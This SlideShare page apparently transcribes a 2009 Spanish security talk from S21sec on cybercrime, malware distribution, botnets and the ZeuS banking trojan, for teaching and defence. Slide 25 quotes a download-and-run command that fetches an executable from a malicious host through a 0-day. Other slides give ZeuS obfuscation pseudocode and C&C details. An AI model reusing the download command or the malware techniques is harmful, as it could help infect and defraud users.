Cibercrimen   Fraude Y Malware   Mikel Gastesi
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

Cibercrimen Fraude Y Malware Mikel Gastesi

on

  • 5,562 views

Charla impartida por Mikel Gastesi, de S21Sec, en el curso de Verano de la Universidad de Salamanca 2009.

Charla impartida por Mikel Gastesi, de S21Sec, en el curso de Verano de la Universidad de Salamanca 2009.

Statistics

Views

Total Views
5,562
Views on SlideShare
3,423
Embed Views
2,139

Actions

Likes
2
Downloads
86
Comments
0

5 Embeds 2,139

http://www.elladodelmal.com 1998
http://elladodelmal.blogspot.com 136
http://www.slideshare.net 3
http://www.techgig.com 1
http://webcache.googleusercontent.com 1

Accessibility

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Cibercrimen Fraude Y Malware Mikel Gastesi Presentation Transcript

  • 1. *[ CIBERCRIMEN: FRAUDE Y MALWARE ] Autor: Mikel Gastesi Urroz mgastesi@s21sec.com Fecha: 10-07-2009
  • 2. Confidencialidad La información facilitada en este documento es propiedad de S21sec, quedando terminantemente prohibida la modificación o explotación de la totalidad o parte de los contenidos del presente documento, sin el consentimiento expreso y por escrito de S21sec, sin que en ningún caso la no contestación a la correspondiente solicitud pueda ser entendida como autorización presunta para su utilización. Pág. 2
  • 3. Índice Introducción - ¿Cibercrimen? Evolución Distribución Infección Botnets • ZeuS/Zbot Money, money, money Pág. 3
  • 4. INTRODUCCIÓN - ¿CIBERCRIMEN? Pág. 4
  • 5. ¿CIBERCRIMEN?
  • 6. EVOLUCIÓN (de la mentalidad)
  • 7. EVOLUCION 1 persona • Ataques dirigidos • Recursos limitados Grupos profesionales • Ataques indiscriminados/masivos • Muchos recursos técnicos
  • 8. EVOLUCIÓN Cambio de objetivos Inicios: Ataques al servidor • Necesidad de pocos recursos • Mayor conciencia de seguridad Ahora: Ataque a los clientes • Necesidad de manejar mucha información • Necesidad de una infraestructura tecnológica • Poca conciencia de seguridad
  • 9. EVOLUCIÓN 1 servidor • Búsqueda de vulnerabilidades • Atacante trata de acceder al servidor N clientes • Vulnerabilidades conocidas • Victima accede al vector de infección • ¿Phishing? → Malware!!!
  • 10. DISTRIBUCIÓN
  • 11. DISTRIBUCIÓN El malware acude a la víctima • SPAM • Búsqueda y robo de contactos • P2P • Ingeniería social • Descargas con “regalo”
  • 12. EJ. SPAM
  • 13. EJ. SPAM
  • 14. DISTRIBUCIÓN La víctima acude al malware • Páginas fraudulentas • Falsos antivirus • Falsas páginas de vídeos • Páginas comprometidas • Páginas legítimas atacas indiscriminadamente
  • 15. EJ. FAKE AV
  • 16. EJ. FAKE AV
  • 17. DISTRIBUCIÓN Página comprometida, ¿cómo? • Nine ball: 40000 páginas comprometidas • Cuentas FTP • Diccionario/Brute force • SQL injection • RFI • Exploits recientes, 0-days
  • 18. SQL INJECTION MASIVO
  • 19. INFECCIÓN
  • 20. INFECCIÓN
  • 21. INFECCIÓN Software vulnerable • Sistema Operativo • Navegador • Complementos • Flash • PDF... TODO programa que interactúe con el exterior es una POSIBLE víctima.
  • 22. UNAS ESTADÍSTICAS... [secunia]
  • 23. INFECCIÓN
  • 24. INFECCIÓN Víctima “vulnerable” • Ejecución de ficheros adjuntos • Doble extensión (.doc______.exe) Confianza en la página • Codecs No siempre se está a salvo teniendo todo el software actualizado • 0-days • Ventana de tiempo de los antivirus
  • 25. INFECCIÓN Microsoft DirectShow 0-day (msvidctl.dll) • Páginas comprometidas • Inyecta 8oy4t.8866.org/aa/go.jpg • Muchos exploits, entre ellos el 0day • 2000, 2003 y XP vulnerables • Ejecuta: C:[%programfiles%]Internet Exploreriexplore.exe "http://milllk.com/wm/svchost.exe" • Detectado por solamente por 2 AV (VirusTotal) • Por ahora, v0.1 http://www.securityfocus.com/bid/35558 http://www.csis.dk/en/news/news.asp?tekstID=799 http://www.microsoft.com/technet/security/advisory/97 2890.mspx
  • 26. INFECCIÓN La cadena es tan fuerte como el eslabón más débil
  • 27. BOTNETS
  • 28. BOTNETS
  • 29. BOTNETS
  • 30. BOTNETS Uso: • Proxy • Ataques DdoS • Obtención de credenciales • Hosting • SPAM • Supercomputadora • ...
  • 31. BOTNETS No solo PCs Botnets ocultas tras Bullet-proof ISP • No responden a avisos de abuso • Alojan paneles de control • Alojan vectores de infección y malware • Fraudulento
  • 32. TROYANOS BANCARIOS - ZeuS
  • 33. TROYANOS BANCARIOS Silenciosos Distribución masiva Botnet Robar credenciales MitB ¿Por qué no más? ¡Es gratis! • Control de la máquina • Proxy • … Programado por humanos • Parámetros • Idioma, user-agent...
  • 34. TROYANOS BANCARIOS Actores • Sinowal • Torpig • Buena ocultación • Generación de dominios mediante algoritmo • Arrestos • BankPatch • MitB • ZeuS • Más sencillo • Ocultación user-mode • ¡El rey del mambo!
  • 35. ZEUS Finales 2006 • Simple bot • ~3000$ Principios 2007 • Se hace popular • ~700$ Finales 2007 • Versiones personalizadas Mediados 2008 • Vulnerabilidades • Implementaciones en paralelo 2009 • Vulnerabilidades corregidas • Soporta parcialmente IPv6...
  • 36. ZEUS – CAMBIOS IMPORTANTES Corrección de bugs • Mal saneamiento de parámetros • Escritura de ficheros • ¡Guerra! 10-12-2008 → RC4 • Local data requests to the server and the configuration file can be encrypted with RC4 key depending on your choice
  • 37. ZEUS
  • 38. ZEUS Distribución • SPAM • Facturas • E-cards • Michael Jackson • Kits de exploits
  • 39. ZEUS - CARACTERÍSTICAS Bot Actualización configuración Actualización del binario /etc/hosts Socks proxy Inyección HTML Redirección HTML Capturas de pantalla Capturas de teclados virtuales Captura de credenciales Robo certificados KillOS
  • 40. ZEUS - TODO Compatibility with Windows Vista and Windows 7 Improved WinAPI hooking Random generation of configuration files to avoid generic detection Console-based builder Version supporing 64 bit processors Full IPv6 support Detailed statistics on antivirus software and firewalls installed on the infected machines
  • 41. ZEUS
  • 42. ZEUS - FICHEROS 1.0.x.x • ntos.exe • wnspoemaudio.dll • wnspoemvideo.dll … … 1.2.x.x • sdra64.exe • lowseclocal.ds • lowsecaudio.ds ¿1.3.x.x? • bootwindows.exe • skype32win32post.dll • skype32win64post.dll
  • 43. ZEUS
  • 44. ZEUS
  • 45. ZEUS Config file: • Cifrado con RC4 • Update binary • Url C&C server • Advanced configuration • Webfilters • WebFakes • WebInjects
  • 46. ZEUS Ficheros de datos • Cifrado RC4 al servidor • Cifrado. For i = 1 to Length(Data) If (i % 2) == 0 Data[i] -= 7 + i * 2 Else Data[i] += 10 + i * 2
  • 47. ZEUS - C&C
  • 48. ZEUS - C&C Instalación: • Siguiente → Siguiente → Final PHP + mysql • O ficheros Generador de ficheros de configuración y binarios. Opciones del panel de control
  • 49. ZEUS - C&C Instalación: • Siguiente → Siguiente → Final PHP + mysql • O ficheros Generador de ficheros de configuración y binarios. Opciones del panel de control
  • 50. Zeus – C&C Opciones • Botnet : Bots online • Botnet : Comandos remotos • Logs : Búsqueda • Logs : Ficheros subidos • System : Perfil • System : Opciones
  • 51. ZEUS
  • 52. ZEUS KillOS • HKEY_CURRENT_USER • HKEY_LOCAL_MACHINEsoftware • HKEL_LOCAL_MACHINEsystem • Trata de llenar de ceros toda la memoria. • BSOD
  • 53. ZEUS KillOS • HKEY_CURRENT_USER • HKEY_LOCAL_MACHINEsoftware • HKEL_LOCAL_MACHINEsystem • Trata de llenar de ceros toda la memoria. • BSOD
  • 54. MONEY, MONEY, MONEY
  • 55. LUCRO Crear malware y venderlo Crear botnet y alquilarla Obtención de credenciales y venderlas Obtención de dinero gracias a las credenciales
  • 56. LUCRO
  • 57. LUCRO
  • 58. LUCRO
  • 59. LUCRO
  • 60. LUCRO Transferencias Compra de bienes • Físicos • Virtuales Subastas ...deja volar tu imaginación
  • 61. *[ MUCHAS GRACIAS ] Pág. 61